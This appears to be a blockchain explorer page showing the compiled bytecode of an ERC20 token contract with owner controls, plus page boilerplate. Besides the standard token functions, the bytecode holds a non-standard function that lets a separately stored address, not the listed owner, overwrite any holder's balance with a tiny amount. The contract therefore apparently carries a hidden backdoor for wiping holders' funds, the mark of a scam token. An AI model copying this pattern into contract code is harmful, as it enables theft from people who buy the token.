b6107fa8286868403610a7e565b60019250505092915050565b600080610811610a76565b905061081e818585610cd3565b600191505092915050565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108b8610a76565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610947576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093e906113b8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ad906114dc565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae49061156e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5390611600565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c3a919061116d565b60405180910390a3505050565b6000610c538484610829565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ccd5781811015610cbf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb69061166c565b60405180910390fd5b610ccc8484848403610a7e565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d42576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d39906116fe565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da890611790565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e38576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2f90611822565b60405180910390fd5b8181610e449190611842565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610ed982600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8790919063ffffffff16565b600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f79919061116d565b60405180910390a350505050565b60008183610f959190611338565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610fd7578082015181840152602081019050610fbc565b60008484015250505050565b6000601f19601f8301169050919050565b6000610fff82610f9d565b6110098185610fa8565b9350611019818560208601610fb9565b61102281610fe3565b840191505092915050565b600060208201905081810360008301526110478184610ff4565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061107f82611054565b9050919050565b61108f81611074565b811461109a57600080fd5b50565b6000813590506110ac81611086565b92915050565b6000819050919050565b6110c5816110b2565b81146110d057600080fd5b50565b6000813590506110e2816110bc565b92915050565b600080604083850312156110ff576110fe61104f565b5b600061110d8582860161109d565b925050602061111e858286016110d3565b9150509250929050565b60008115159050919050565b61113d81611128565b82525050565b60006020820190506111586000830184611134565b92915050565b611167816110b2565b82525050565b6000602082019050611182600083018461115e565b92915050565b6000806000606084860312156111a1576111a061104f565b5b60006111af8682870161109d565b93505060206111c08682870161109d565b92505060406111d1868287016110d3565b9150509250925092565b600060ff82169050919050565b6111f1816111db565b82525050565b600060208201905061120c60008301846111e8565b92915050565b6000602082840312156112285761122761104f565b5b60006112368482850161109d565b91505092915050565b61124881611074565b82525050565b6000602082019050611263600083018461123f565b92915050565b600080604083850312156112805761127f61104f565b5b600061128e8582860161109d565b925050602061129f8582860161109d565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806112f057607f821691505b602082108103611303576113026112a9565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611343826110b2565b915061134e836110b2565b925082820190508082111561136657611365611309565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006113a2602083610fa8565b91506113ad8261136c565b602082019050919050565b600060208201905081810360008301526113d181611395565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611434602583610fa8565b915061143f826113d8565b604082019050919050565b6000602082019050818103600083015261146381611427565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006114c6602683610fa8565b91506114d18261146a565b604082019050919050565b600060208201905081810360008301526114f5816114b9565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611558602483610fa8565b9150611563826114fc565b604082019050919050565b600060208201905081810360008301526115878161154b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006115ea602283610fa8565b91506115f58261158e565b604082019050919050565b60006020820190508181036000830152611619816115dd565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611656601d83610fa8565b915061166182611620565b602082019050919050565b6000602082019050818103600083015261168581611649565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116e8602583610fa8565b91506116f38261168c565b604082019050919050565b60006020820190508181036000830152611717816116db565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061177a602383610fa8565b91506117858261171e565b604082019050919050565b600060208201905081810360008301526117a98161176d565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061180c602683610fa8565b9150611817826117b0565b604082019050919050565b6000602082019050818103600083015261183b816117ff565b9050919050565b600061184d826110b2565b9150611858836110b2565b92508282039050818111156118705761186f611309565b5b9291505056fea2646970667358221220183d01fe04ba031bfd75cf3772c90fda064f01378c5077fca67fa1e71ac0a67864736f6c63430008130033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b8063715018a61461021457806376f688d31461021e5780638da5cb5b1461023a57806395d89b4114610258576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061102d565b60405180910390f35b610132600480360381019061012d91906110e8565b6103b4565b60405161013f9190611143565b60405180910390f35b6101506103d7565b60405161015d919061116d565b60405180910390f35b610180600480360381019061017b9190611188565b6103e0565b60405161018d9190611143565b60405180910390f35b61019e61040f565b6040516101ab91906111f7565b60405180910390f35b6101ce60048036038101906101c991906110e8565b610418565b6040516101db9190611143565b60405180910390f35b6101fe60048036038101906101f99190611212565b61044f565b60405161020b919061116d565b60405180910390f35b61021c610498565b005b61023860048036038101906102339190611212565b6105f0565b005b6102426106d3565b60405161024f919061124e565b60405180910390f35b6102606106fd565b60405161026d919061102d565b60405180910390f35b610290600480360381019061028b91906110e8565b61078f565b60405161029d9190611143565b60405180910390f35b6102c060048036038101906102bb91906110e8565b610806565b6040516102cd9190611143565b60405180910390f35b6102f060048036038101906102eb9190611269565b610829565b6040516102fd919061116d565b60405180910390f35b610320600480360381019061031b9190611212565b6108b0565b005b606060078054610331906112d8565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112d8565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a76565b90506103cc818585610a7e565b600191505092915050565b60008054905090565b6000806103eb610a76565b90506103f8858285610c47565b610403858585610cd3565b60019150509392505050565b60006009905090565b600080610423610a76565b90506104448185856104358589610829565b61043f9190611338565b610a7e565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104a0610a76565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461052f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610526906113b8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461068a57600360008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461068d565b60045b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606002805461070c906112d8565b80601f0160208091040260200160405190810160405280929190818152602001828054610738906112d8565b80156107855780601f1061075a57610100808354040283529160200191610785565b820191906000526020600020905b81548152906001019060200180831161076857829003601f168201915b5050505050905090565b60008061079a610a76565b905060006107a88286610829565b9050838110156107ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e49061144a565b60405180910390fd5b6107fa8286868403610a7e565b60019250505092915050565b600080610811610a76565b905061081e818585610cd3565b600191505092915050565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108b8610a76565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610947576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093e906113b8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ad906114dc565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae49061156e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5390611600565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c3a919061116d565b60405180910390a3505050565b6000610c538484610829565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ccd5781811015610cbf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb69061166c565b60405180910390fd5b610ccc8484848403610a7e565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d42576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d39906116fe565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da890611790565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e38576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2f90611822565b60405180910390fd5b8181610e449190611842565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610ed982600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8790919063ffffffff16565b600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f79919061116d565b60405180910390a350505050565b60008183610f959190611338565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610fd7578082015181840152602081019050610fbc565b60008484015250505050565b6000601f19601f8301169050919050565b6000610fff82610f9d565b6110098185610fa8565b9350611019818560208601610fb9565b61102281610fe3565b840191505092915050565b600060208201905081810360008301526110478184610ff4565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061107f82611054565b9050919050565b61108f81611074565b811461109a57600080fd5b50565b6000813590506110ac81611086565b92915050565b6000819050919050565b6110c5816110b2565b81146110d057600080fd5b50565b6000813590506110e2816110bc565b92915050565b600080604083850312156110ff576110fe61104f565b5b600061110d8582860161109d565b925050602061111e858286016110d3565b9150509250929050565b60008115159050919050565b61113d81611128565b82525050565b60006020820190506111586000830184611134565b92915050565b611167816110b2565b82525050565b6000602082019050611182600083018461115e565b92915050565b6000806000606084860312156111a1576111a061104f565b5b60006111af8682870161109d565b93505060206111c08682870161109d565b92505060406111d1868287016110d3565b9150509250925092565b600060ff82169050919050565b6111f1816111db565b82525050565b600060208201905061120c60008301846111e8565b92915050565b6000602082840312156112285761122761104f565b5b60006112368482850161109d565b91505092915050565b61124881611074565b82525050565b6000602082019050611263600083018461123f565b92915050565b600080604083850312156112805761127f61104f565b5b600061128e8582860161109d565b925050602061129f8582860161109d565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806112f057607f821691505b602082108103611303576113026112a9565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611343826110b2565b915061134e836110b2565b925082820190508082111561136657611365611309565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006113a2602083610fa8565b91506113ad8261136c565b602082019050919050565b600060208201905081810360008301526113d181611395565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611434602583610fa8565b915061143f826113d8565b604082019050919050565b6000602082019050818103600083015261146381611427565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006114c6602683610fa8565b91506114d18261146a565b604082019050919050565b600060208201905081810360008301526114f5816114b9565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611558602483610fa8565b9150611563826114fc565b604082019050919050565b600060208201905081810360008301526115878161154b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006115ea602283610fa8565b91506115f58261158e565b604082019050919050565b60006020820190508181036000830152611619816115dd565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611656601d83610fa8565b915061166182611620565b602082019050919050565b6000602082019050818103600083015261168581611649565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116e8602583610fa8565b91506116f38261168c565b604082019050919050565b60006020820190508181036000830152611717816116db565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061177a602383610fa8565b91506117858261171e565b604082019050919050565b600060208201905081810360008301526117a98161176d565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061180c602683610fa8565b9150611817826117b0565b604082019050919050565b6000602082019050818103600083015261183b816117ff565b9050919050565b600061184d826110b2565b9150611858836110b2565b92508282039050818111156118705761186f611309565b5b9291505056fea2646970667358221220183d01fe04ba031bfd75cf3772c90fda064f01378c5077fca67fa1e71ac0a67864736f6c63430008130033
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 31 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.